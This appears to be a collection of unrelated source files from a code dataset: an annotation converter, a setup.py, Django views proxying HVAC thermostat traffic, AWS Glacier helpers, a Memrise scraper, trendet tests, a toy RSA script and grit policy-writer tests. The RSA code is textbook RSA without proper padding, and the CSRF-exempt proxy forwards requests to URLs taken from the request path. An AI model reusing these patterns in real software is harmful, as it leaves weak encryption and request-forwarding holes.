def convert_annotations(in_dir: str, classes: list, out_dir: str, relative_img_path: str) -> None:
"""Converts Pascal VOC annotations to YOLO annotations and creates a train.txt required
for training.
Adapted from https://github.com/AlexeyAB/darknet"""
filenames = []
annotation_dir = join(out_dir, "labels")
count = 0
if not os.path.exists(annotation_dir):
os.makedirs(annotation_dir)
for voc_file in tqdm(glob.glob(in_dir + '/*.xml'), desc="Processing XMLs..."):
tree = ET.parse(voc_file)
root = tree.getroot()
file = root.find('filename').text
filenames.append(file)
filename = file.split('.')[0]
out = join(annotation_dir, filename + ".txt")
out_file = open(out, 'w')
size = root.find('size')
w = int(size.find('width').text)
h = int(size.find('height').text)
for obj in root.iter('object'):
difficult = obj.find('difficult').text
cls = obj.find('name').text
if cls not in classes or int(difficult) == 1:
continue
cls_id = classes.index(cls)
xmlbox = obj.find('bndbox')
b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(
xmlbox.find('ymin').text), float(xmlbox.find('ymax').text))
bb = convert((w, h), b)
out_file.write(str(cls_id) + " " +
" ".join([str(a) for a in bb]) + '\n')
count += 1
# Write train_txt
train_file = join(out_dir, 'aisscv-train.txt')
if os.path.exists(train_file):
os.remove(train_file)
with open(train_file, 'a') as train_txt:
for file in filenames:
out_str = join(relative_img_path, file) + "\n"
train_txt.write(out_str)
print("Converted {} files.".format(count))
def main(args):
classes = ['box', 'open', 'dent', 'hole']
if args.train_txt_path is not None:
# Only executed if you want to change the paths
print("Changing img paths in train.txt to \"" +
args.relative_img_path + "\"")
change_train_txt_paths(os.path.join(args.train_txt_path),
args.relative_img_path)
return
if args.output_path is not None:
# Primary execution path for transforming labels
out_dir = os.path.expanduser(args.output_path)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
if args.xml_dir is not None:
convert_annotations(args.xml_dir, classes,
out_dir, args.relative_img_path)
create_obj_names(classes, out_dir)
if __name__ == '__main__':
args = parse_args()
print('=========CALLED MAIN OF PASCAL2YOLO==========')
main(args)
``` |
{
"source": "jojurgens/pyqode.qt",
"score": 2
} |
#### File: jojurgens/pyqode.qt/setup.py
```python
import sys
from setuptools import setup, find_packages
def read_version():
with open("pyqode/qt/__init__.py") as f:
lines = f.read().splitlines()
for l in lines:
if "__version__" in l:
return l.split("=")[1].strip().replace(
"'", '').replace('"', '')
DESCRIPTION = 'Shim library that wraps PyQt5, PyQt4 and PySide'
def readme():
if 'bdist_deb' in sys.argv or 'sdist_dsc' in sys.argv:
return DESCRIPTION
return str(open('README.rst').read())
setup(
name='pyqode.qt',
namespace_packages=['pyqode'],
version=read_version(),
packages=[p for p in find_packages() if 'test' not in p],
keywords=["qt PyQt4 PyQt5 PySide"],
url='https://github.com/pyQode/pyqode.qt',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
description=DESCRIPTION,
long_description=readme(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: X11 Applications :: Qt',
'Environment :: Win32 (MS Windows)',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Widget Sets'])
``` |
{
"source": "jokajak/infinity_tracker",
"score": 2
} |
#### File: infinity_tracker/proxy/views.py
```python
import logging
# from django.conf import settings
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from requests import Request, Session
# from defusedxml import ElementTree as ET
# Get an instance of a logger
logger = logging.getLogger(__name__)
def proxy_request(request):
headers = dict(request.headers)
full_uri = request.build_absolute_uri()
method = request.method
content_length = int(request.headers.get("Content-Length", 0) or 0)
# now = datetime.datetime.now().strftime("%Y%m%d_%H%M")
# if settings.get("SAVE_REQUESTS", False) and content_length > 0 and request.method == "POST":
# fname = "req_{uri}_{now}.xml".format(
# uri=request.resolver_match.func.__name__, now=now
# )
# req_file = "{media}/{fname}".format(media=settings.MEDIA_ROOT, fname=fname)
# with open(req_file, "w") as f:
# f.write(request.POST["data"])
logger.debug("{method}: {uri}".format(method=method, uri=full_uri))
headers["Content-Length"] = str(content_length)
s = Session()
req = Request(method, full_uri, headers=headers, data=request.body)
prepped = req.prepare()
r = s.send(prepped)
logger.debug("Response: {response}".format(response=r.content))
# if settings.get("SAVE_RESPONSES", False) and r.content:
# fname = "resp_{uri}_{now}.xml".format(
# uri=request.resolver_match.func.__name__, now=now
# )
# req_file = "{media}/{fname}".format(media=settings.MEDIA_ROOT, fname=fname)
# with open(req_file, "wb") as f:
# f.write(r.content)
return r
# Create your views here.
@csrf_exempt
def release_notes(request, uri=None):
"""Handle release note requests.
Release note requests come in with a different URI as the path so they
must be handled differently.
"""
logger.info("Received release_notes request")
headers = dict(request.headers)
full_uri = "http{uri}".format(uri=uri)
method = request.method
content_length = int(request.headers.get("Content-Length", 0) or 0)
logger.debug("{method}: {uri}".format(method=method, uri=full_uri))
headers["Content-Length"] = str(content_length)
s = Session()
req = Request(method, full_uri, headers=headers, data=request.body)
prepped = req.prepare()
r = s.send(prepped)
logger.debug("Response: {response}".format(response=r.content))
return r
@csrf_exempt
def default_handler(request, path=None):
"""Handle all other requests
This view handles all other request types
"""
logger.info("Unmanaged path: {path}".format(path=path))
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def alive(request):
"""Handle alive checks.
This view handles proxying alive checks performed by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_overview(request, serial):
"""Handle system posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_profile(request, serial):
"""Handle system profile posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_status(request, serial):
"""Handle system status posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_dealer(request, serial):
"""Handle system dealer posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_notifications(request, serial):
"""Handle system notifications posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_idu_config(request, serial):
"""Handle system In-Door Unit posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_odu_config(request, serial):
"""Handle system Out-Door Unit posts.
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
@csrf_exempt
def systems_equipment_events(request, serial):
"""Handle system equipment events posts
This view handles processing system status updates by the HVAC unit.
"""
r = proxy_request(request)
response = HttpResponse(
content=r.content,
status=r.status_code,
content_type=r.headers.get("Content-Type"),
)
return response
``` |
{
"source": "jokallun/photo-organizers",
"score": 2
} |
#### File: jokallun/photo-organizers/aws_contexts.py
```python
import boto3
class GlacierCtx(object):
"""Context manager for glacier, sets defaults"""
def __init__(self, ctx, region=None):
self.region = region or ctx.config['glacier']['region']
self.glacier = boto3.resource('glacier', region_name=self.region)
def __enter__(self):
return self.glacier
def __exit__(self, *args):
pass
class VaultCtx(GlacierCtx):
"""Context manager for glacier vault, sets defaults"""
def __init__(self, ctx, vault_name=None, account_id=None, region=None):
GlacierCtx.__init__(self, ctx, region)
self.account_id = account_id or ctx.config['glacier']['account_id']
self.vault_name = vault_name or ctx.config['glacier']['vault_name']
self.vault = self.glacier.Vault(self.account_id, self.vault_name)
def __enter__(self):
return self.vault
class JobCtx(VaultCtx):
"""Context manager for glacier job, sets defaults"""
def __init__(self, ctx, id, vault_name=None, account_id=None, region=None):
VaultCtx.__init__(self, ctx, vault_name, account_id, region)
self.job = self.glacier.Job(account_id=self.account_id, vault_name=self.vault_name, id=id)
def __enter__(self):
return self.job
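# Rough usage sketch (assumes `ctx` is a context object whose ctx.config dict
# provides the glacier defaults, e.g. loaded from a YAML/JSON config file):
#
#     with VaultCtx(ctx) as vault:
#         vault.upload_archive(archiveDescription='photos-2020.tar', body=data)
#
#     with JobCtx(ctx, id=job_id) as job:
#         output = job.get_output()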
``` |
{
"source": "jokandre/memrise-scraper",
"score": 3
} |
#### File: memrise-scraper/memrise_scraper/memrise.py
```python
import argparse
import codecs, sys
import re
import requests
from bs4 import BeautifulSoup
import json
from pypinyin import pinyin, Style
COURSE_URL = "/course/977288/korean-grammar-in-use-11/"
CARD_COLUMNS = ("col_a", "col_b")
def lazy_property(fn):
"""Decorator that makes a property lazy-evaluated.
"""
attr_name = '_lazy_' + fn.__name__
@property
def _lazy_property(self):
if not hasattr(self, attr_name):
setattr(self, attr_name, fn(self))
return getattr(self, attr_name)
return _lazy_property
def get_soup(url):
# TODO: it works actually w/o cookies:
res = requests.get(
url if url.strip().startswith("http") else "http://www.memrise.com" + url)
soup = BeautifulSoup(res.text, "html.parser")
return soup
class Course(object):
def __init__(self, course_url):
match = re.match(r'^(.*)/(\d+)/?$', course_url)
if match:
course_url, level = match.groups()
else:
level = None
self.course_url = course_url
# a sligle level if it was included in the URL
self.level = level
@lazy_property
def soup(self):
return get_soup(self.course_url)
@property
def name(self):
el = self.soup.find("h1", class_="course-name")
return el.text if el else self.course_url.split('/')[-1]
@property
def levels(self):
#levels = soup.find(lambda tag: tag.name == "div" and "levels" in tag.attrs.get("class"))
levels = self.soup.find_all("a", class_="level")
for l in levels:
url = l.attrs.get("href")
if self.level and not url.endswith(self.level + '/'):
                continue  # skip levels that were not requested
title = l.find("div", class_="level-title").text.strip()
yield (url, title)
def cards(self, *, level_url : str):
"""
:level_url: level URL
"""
def get_text(value):
return '' if value is None else value.text
soup = get_soup(level_url)
for thing in soup.find_all(lambda tag: tag.has_attr("data-thing-id")):
try:
cols = (get_text(thing.find("div", class_=col_name).find("div", class_="text"))
for col_name in CARD_COLUMNS)
except:
continue
yield cols
class CourseDataHolder(object):
def __init__(self, course_title):
self.course_title = course_title
self.levels = []
def addLevel(self, level_name, items):
self.levels.append({'title':level_name, 'rows': items})
def dump_course(*, course_url : str):
"""
:course_url: course URL
"""
course = Course(course_url=course_url)
for level_url, title in course.levels:
print("*** %s (%s)" % (title, level_url))
for card in course.cards(level_url=level_url):
print('\t'.join(card))
def dump_course2json(*, course_url:str, to_add_pinyin:bool):
"""
:course_url: course URL
"""
course = Course(course_url=course_url)
courseData = CourseDataHolder(course_url.split('/')[3])
for level_url, title in course.levels:
print("*** %s (%s)" % (title, level_url))
temp = []
for card in course.cards(level_url=level_url):
cols = list(card)
row_obj = {}
if to_add_pinyin:
pin = pinyin(cols[0], style=Style.TONE3)
flat_pin = [item for sublist in pin for item in sublist]
flat_pin = cedict_tones(flat_pin)
row_obj = {'a': cols[0], 'b': cols[1], 'pron': ' '.join(flat_pin)}
else:
row_obj = {'a': cols[0], 'b': cols[1]}
temp.append(row_obj)
courseData.addLevel(title, temp)
# print(courseData.__dict__, len(courseData.levels))
print(json.dumps(courseData.__dict__, ensure_ascii=False))
def cedict_tones(word):
"""
Convert <neutral tone> to 5, ie, le -> le5
:return: retval, array of pinyin pronunciations
"""
retval = []
for pron in word:
if not pron[-1].isdecimal():
pron = pron+'5'
retval.append(pron)
return retval
def main(course_url='', to_json=True, to_add_pinyin=True):
sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach())
# course_url = COURSE_URL if len(sys.argv) < 2 else sys.argv[1]
if to_json:
dump_course2json(course_url=course_url, to_add_pinyin=to_add_pinyin)
else:
dump_course(course_url=course_url)
if __name__ == "__main__":
P = argparse.ArgumentParser(
description='Scrape data from Memrise courses.'
)
P.add_argument(
'-u', '--url',
help='Partial url of the course, ie, /course/184712/practical-audio-visual-chinese-book-2-2/',
# required=True,
default='/course/184712/practical-audio-visual-chinese-book-2-2/'
)
P.add_argument(
'-j', '--json',
help='Use JSON formated output',
# required=True,
default=True
)
P.add_argument(
'-p', '--pinyin',
help='Add pinyin according to CCDICT dictionary',
default=True
)
ARGS = P.parse_args()
main(course_url=ARGS.url, to_json=ARGS.json, to_add_pinyin=ARGS.pinyin)
``` |
{
"source": "jokaorgua/trendet",
"score": 2
} |
#### File: trendet/tests/test_trendet_errors.py
```python
import pytest
from investpy import get_stock_historical_data
import trendet
def test_errors():
"""
This function raises trendet errors to improve coverage
"""
params = [
{
'stock': ['error'],
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': None,
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'error',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': None,
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'error',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': ['error'],
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': None,
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': None,
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2019',
'to_date': '01/01/2018',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01-2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '_01*01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 0,
'trend_limit': 3,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': -1,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': None,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': None,
'trend_limit': 1,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 'error',
'trend_limit': 1,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 1,
'trend_limit': 'error',
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 2,
'trend_limit': 5,
'labels': None,
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': ['a', 'b'],
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': 'error',
'identify': 'both',
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': ['error'],
},
{
'stock': 'BBVA',
'country': 'Spain',
'from_date': '01/01/2018',
'to_date': '01/01/2019',
'window_size': 5,
'trend_limit': 3,
'labels': None,
'identify': 'error',
},
]
for param in params:
try:
trendet.identify_trends(stock=param['stock'],
country=param['country'],
from_date=param['from_date'],
to_date=param['to_date'],
window_size=param['window_size'],
trend_limit=param['trend_limit'],
labels=param['labels'],
identify=param['identify'])
except:
pass
try:
trendet.identify_all_trends(stock=param['stock'],
country=param['country'],
from_date=param['from_date'],
to_date=param['to_date'],
window_size=param['window_size'],
identify=param['identify'])
except:
pass
df = get_stock_historical_data(stock='REP',
country='Spain',
from_date='01/01/2018',
to_date='01/01/2019')
df['error'] = 'error'
params = [
{
'df': None,
'column': 'Close',
'window_size': 5,
'identify': 'both'
},
{
'df': ['error'],
'column': 'Close',
'window_size': 5,
'identify': 'both'
},
{
'df': df,
'column': None,
'window_size': 5,
'identify': 'both'
},
{
'df': df,
'column': ['error'],
'window_size': 5,
'identify': 'both'
},
{
'df': df,
'column': 'error',
'window_size': 5,
'identify': 'both'
},
{
'df': df,
'column': 'error',
'window_size': 5,
'identify': 'both'
},
{
'df': df,
'column': 'Close',
'window_size': None,
'identify': 'both'
},
{
'df': df,
'column': 'Close',
'window_size': 1,
'identify': 'both'
},
{
'df': df,
'column': 'Close',
'window_size': 5,
'identify': ['error']
},
{
'df': df,
'column': 'Close',
'window_size': 5,
'identify': 'error'
},
]
for param in params:
try:
trendet.identify_df_trends(df=param['df'],
column=param['column'],
window_size=param['window_size'],
identify=param['identify'])
except:
pass
if __name__ == '__main__':
test_errors()
``` |
{
"source": "jokasimr/rsa-implementation",
"score": 3
} |
#### File: jokasimr/rsa-implementation/crypt.py
```python
from secrets import randbelow
from math import log
import os
def generate_prime(bit_length):
bit_length = int(bit_length)
assert bit_length > 0
return int(os.popen(' '.join(['openssl', 'prime', '-generate', '-bits', str(bit_length)])).read())
def gcd(a, b):
while b != 0:
a, b = b, a % b
return a
def lcm(a, b):
return a*b//gcd(a, b)
def ctf(a,b):
return lcm(a-1, b-1)
def inverse(a, n):
t, newt = 0, 1
r, newr = n, a
while newr != 0:
quotient = r // newr
t, newt = newt, t - quotient * newt
r, newr = newr, r - quotient * newr
assert not r > 1
if t < 0 :
t = t + n
return t
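# Example (illustrative): inverse(7, 40) == 23, since 7 * 23 = 161 = 4*40 + 1,
# i.e. 7 * 23 ≡ 1 (mod 40). This is the extended Euclidean algorithm, used
# below to derive the private exponent d from e modulo the Carmichael totient.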
def generate_e(l):
maximum = int(min(36, log(l,2)))
minimum = int(min(log(l, 2)/2, 18))
bit_length = randbelow(maximum-minimum)+minimum
e = generate_prime(bit_length=bit_length)
t = 0
while l%e==0:
t+=1
assert t<10
e = generate_prime(bit_length=bit_length)
return e
def create_key(p=None, q=None, bit_length=1024):
if not p:
p = generate_prime(bit_length)
if not q:
q = generate_prime(bit_length)
l = ctf(p, q)
e = generate_e(l)
d = inverse(e, l)
n = p*q
assert (e*d)%l == 1
return e, d, n
def padd(block, size):
cont = 10**size
return int(''.join(str(cont + ord(c)) \
for c in block))
def unpadd(block, size):
cont = 10**size
s = []
while block>0:
n = block%cont
block = block//(cont*10)
s.append(chr(n))
return ''.join(reversed(s))
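# Illustrative round trip (size=3): padd('Hi', 3) -> int('1072' + '1105') ==
# 10721105, because each character is encoded as 10**3 + ord(c) ('H' -> 1072,
# 'i' -> 1105); unpadd(10721105, 3) recovers 'Hi'. These fixed-width blocks
# are what encrypt()/decrypt() below exponentiate with the RSA key.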
def encrypt(x, pub_key, size=6):
res = []
i = 0
e, n = pub_key
block_size = len(str(n))//(size+1)
while len(x)>i:
if len(x)-i>block_size:
res.append(str(pow(padd(x[i:i+block_size], size=size), e, n)))
else:
res.append(str(pow(padd(x[i:], size=size), e, n)))
i+=block_size
return '/'.join(res)
def decrypt(y, key, size=6):
d, n = key
return ''.join(unpadd(pow(int(block), d, n), size=size) for block in y.split('/'))
# Example usage
e, d, n = create_key(bit_length=2048)
print('keylength: ', len(str(n)))
with open('test.txt', 'r') as foo:
s = foo.read()
se = encrypt(s, (e, n), size=3)
print('unencrypted length: ', len(s))
print('encrypted length: ', len(se))
t = decrypt(se, (d, n), size=3)
print('Passed test: ', all((c1==c2) for c1,c2 in zip(s,t))) # True if unencrypted and decrypted are equal
``` |
{
"source": "JoKaWare/WTL-DUI",
"score": 2
} |
#### File: grit/extern/FP.py
```python
try:
import hashlib
_new_md5 = hashlib.md5
except ImportError:
import md5
_new_md5 = md5.new
"""64-bit fingerprint support for strings.
Usage:
from extern import FP
print 'Fingerprint is %ld' % FP.FingerPrint('Hello world!')
"""
def UnsignedFingerPrint(str, encoding='utf-8'):
"""Generate a 64-bit fingerprint by taking the first half of the md5
of the string."""
hex128 = _new_md5(str).hexdigest()
int64 = long(hex128[:16], 16)
return int64
def FingerPrint(str, encoding='utf-8'):
fp = UnsignedFingerPrint(str, encoding=encoding)
# interpret fingerprint as signed longs
if fp & 0x8000000000000000L:
fp = - ((~fp & 0xFFFFFFFFFFFFFFFFL) + 1)
return fp
```
#### File: grit/format/interface.py
```python
import re
class ItemFormatter(object):
"""Base class for a formatter that knows how to format a single item."""
def Format(self, item, lang='', output_dir='.'):
"""Format the start of this item.
Returns a Unicode string representing 'item' in the format known by this
item formatter, for the language 'lang'.
Args:
item: anything.
lang: 'en'
output_dir: '.'
Returns:
A unicode string.
"""
return ''
def FormatEnd(self, item, lang='', output_dir='.'):
"""Format the end of this item.
Returns a Unicode string representing the closure of 'item' in the
format known by this item formatter, for the language 'lang'.
Called (optionally) after the children of item have been formatted.
Args:
item: anything
lang: 'en'
output_dir: '.'
Returns:
A unicode string.
"""
return ''
```
#### File: policy_templates/writers/admx_writer_unittest.py
```python
import os
import sys
import unittest
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), '../../../..'))
from grit.format.policy_templates.writers import admx_writer
from grit.format.policy_templates.writers import xml_writer_base_unittest
from xml.dom import minidom
class AdmxWriterTest(xml_writer_base_unittest.XmlWriterBaseTest):
def _CreateDocumentElement(self):
dom_impl = minidom.getDOMImplementation('')
doc = dom_impl.createDocument(None, 'root', None)
return doc.documentElement
def setUp(self):
# Writer configuration. This dictionary contains parameter used by the ADMX
# Writer
config = {
'win_group_policy_class': 'TestClass',
'win_supported_os': 'SUPPORTED_TESTOS',
'win_reg_mandatory_key_name': 'Software\\Policies\\Test',
'win_reg_recommended_key_name': 'Software\\Policies\\Test\\Recommended',
'win_mandatory_category_path': ['test_category'],
'win_recommended_category_path': ['test_recommended_category'],
'admx_namespace': 'ADMXWriter.Test.Namespace',
'admx_prefix': 'test_prefix'
}
self.writer = admx_writer.GetWriter(config)
self.writer.Init()
def _GetPoliciesElement(self, doc):
node_list = doc.getElementsByTagName('policies')
self.assertTrue(node_list.length == 1)
return node_list.item(0)
def _GetCategoriesElement(self, doc):
node_list = doc.getElementsByTagName('categories')
self.assertTrue(node_list.length == 1)
return node_list.item(0)
def testEmpty(self):
self.writer.BeginTemplate()
self.writer.EndTemplate()
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions revision="1.0" schemaVersion="1.0">\n'
' <policyNamespaces>\n'
' <target namespace="ADMXWriter.Test.Namespace"'
' prefix="test_prefix"/>\n'
' <using namespace="Microsoft.Policies.Windows" prefix="windows"/>\n'
' </policyNamespaces>\n'
' <resources minRequiredRevision="1.0"/>\n'
' <supportedOn>\n'
' <definitions>\n'
' <definition displayName="'
'$(string.SUPPORTED_TESTOS)" name="SUPPORTED_TESTOS"/>\n'
' </definitions>\n'
' </supportedOn>\n'
' <categories>\n'
' <category displayName="$(string.test_category)"'
' name="test_category"/>\n'
' <category displayName="$(string.test_recommended_category)"'
' name="test_recommended_category"/>\n'
' </categories>\n'
' <policies/>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
def testEmptyPolicyGroup(self):
empty_policy_group = {
'name': 'PolicyGroup',
'policies': []
}
# Initialize writer to write a policy group.
self.writer.BeginTemplate()
# Write policy group
self.writer.BeginPolicyGroup(empty_policy_group)
self.writer.EndPolicyGroup()
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = ''
self.AssertXMLEquals(output, expected_output)
output = self.GetXMLOfChildren(
self._GetCategoriesElement(self.writer._doc))
expected_output = (
'<category displayName="$(string.test_category)"'
' name="test_category"/>\n'
'<category displayName="$(string.test_recommended_category)"'
' name="test_recommended_category"/>\n'
'<category displayName="$(string.PolicyGroup_group)"'
' name="PolicyGroup">\n'
' <parentCategory ref="test_category"/>\n'
'</category>')
self.AssertXMLEquals(output, expected_output)
def testPolicyGroup(self):
empty_policy_group = {
'name': 'PolicyGroup',
'policies': [
{'name': 'PolicyStub2',
'type': 'main'},
{'name': 'PolicyStub1',
'type': 'main'},
]
}
# Initialize writer to write a policy group.
self.writer.BeginTemplate()
# Write policy group
self.writer.BeginPolicyGroup(empty_policy_group)
self.writer.EndPolicyGroup()
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = ''
self.AssertXMLEquals(output, expected_output)
output = self.GetXMLOfChildren(
self._GetCategoriesElement(self.writer._doc))
expected_output = (
'<category displayName="$(string.test_category)"'
' name="test_category"/>\n'
'<category displayName="$(string.test_recommended_category)"'
' name="test_recommended_category"/>\n'
'<category displayName="$(string.PolicyGroup_group)"'
' name="PolicyGroup">\n'
' <parentCategory ref="test_category"/>\n'
'</category>')
self.AssertXMLEquals(output, expected_output)
def _initWriterForPolicy(self, writer, policy):
'''Initializes the writer to write the given policy next.
'''
policy_group = {
'name': 'PolicyGroup',
'policies': [policy]
}
writer.BeginTemplate()
writer.BeginPolicyGroup(policy_group)
def testMainPolicy(self):
main_policy = {
'name': 'DummyMainPolicy',
'type': 'main',
}
self._initWriterForPolicy(self.writer, main_policy)
self.writer.WritePolicy(main_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.DummyMainPolicy)"'
' explainText="$(string.DummyMainPolicy_Explain)"'
' key="Software\\Policies\\Test" name="DummyMainPolicy"'
' presentation="$(presentation.DummyMainPolicy)"'
' valueName="DummyMainPolicy">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <enabledValue>\n'
' <decimal value="1"/>\n'
' </enabledValue>\n'
' <disabledValue>\n'
' <decimal value="0"/>\n'
' </disabledValue>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testRecommendedPolicy(self):
main_policy = {
'name': 'DummyMainPolicy',
'type': 'main',
}
policy_group = {
'name': 'PolicyGroup',
'policies': [main_policy],
}
self.writer.BeginTemplate()
self.writer.BeginRecommendedPolicyGroup(policy_group)
self.writer.WriteRecommendedPolicy(main_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.DummyMainPolicy)"'
' explainText="$(string.DummyMainPolicy_Explain)"'
' key="Software\\Policies\\Test\\Recommended"'
' name="DummyMainPolicy_recommended"'
' presentation="$(presentation.DummyMainPolicy)"'
' valueName="DummyMainPolicy">\n'
' <parentCategory ref="PolicyGroup_recommended"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <enabledValue>\n'
' <decimal value="1"/>\n'
' </enabledValue>\n'
' <disabledValue>\n'
' <decimal value="0"/>\n'
' </disabledValue>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testStringPolicy(self):
string_policy = {
'name': 'SampleStringPolicy',
'type': 'string',
}
self._initWriterForPolicy(self.writer, string_policy)
self.writer.WritePolicy(string_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.SampleStringPolicy)"'
' explainText="$(string.SampleStringPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleStringPolicy"'
' presentation="$(presentation.SampleStringPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <text id="SampleStringPolicy" valueName="SampleStringPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testIntPolicy(self):
int_policy = {
'name': 'SampleIntPolicy',
'type': 'int',
}
self._initWriterForPolicy(self.writer, int_policy)
self.writer.WritePolicy(int_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="TestClass" displayName="$(string.SampleIntPolicy)"'
' explainText="$(string.SampleIntPolicy_Explain)"'
' key="Software\\Policies\\Test" name="SampleIntPolicy"'
' presentation="$(presentation.SampleIntPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
